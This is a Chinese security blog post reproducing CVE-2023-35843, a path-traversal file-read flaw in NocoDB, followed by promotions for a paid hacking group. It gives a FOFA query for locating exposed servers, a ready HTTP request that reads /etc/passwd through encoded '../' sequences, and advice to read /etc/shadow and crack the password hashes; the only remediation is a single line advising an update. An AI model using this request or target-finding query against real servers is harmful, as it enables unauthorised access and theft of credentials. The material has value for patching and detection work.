【漏洞复现】NocoDB任意文件读取(CVE-2023-35843)

【漏洞复现】NocoDB任意文件读取(CVE-2023-35843)

渗透安全团队 2023-10-14 23:47

前言

由于微信公众号推送机制改变了,快来
星标
不再迷路,谢谢大家!

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!

一:漏洞描述

NocoDB 是 Airtable 的开源替代方案,可以“一键”将 MySQL、PostgreSQL、SQL Server、SQLite 和 MariaDB 转换为智能电子表格。此软件存在任意文件读取漏洞。

二:漏洞影响版本

version<=0.106.1

三:网络空间测绘查询

fofa:icon_hash=”-2017596142″

四:漏洞复现

poc

GET /download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1



五:漏洞利用

可通过读取/etc/shadow读取到加密后的用户名密码,解密后进行后续测试工作

六:修复建议

及时更新至最新版本

原文地址: https://www.freebuf.com/articles/web/379844.html

付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示****


加入安全交流群

                            [                ](http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247489372&idx=1&sn=5e14ba5fa59059fb1ee405e56ef90d40&chksm=c175eaf3f60263e5ef5415a8a9fc134f0890fdb9c25ab956116d17109baf98b3bd6bed572a2d&scene=21#wechat_redirect)

关 注 有 礼

关注下方公众号回复“
666
”可以领取一套领取黑客成长秘籍


 还在等什么?赶紧点击下方名片关注学习吧!

推荐阅读

干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明

由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为
承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

好文分享收藏赞一下最美点在看哦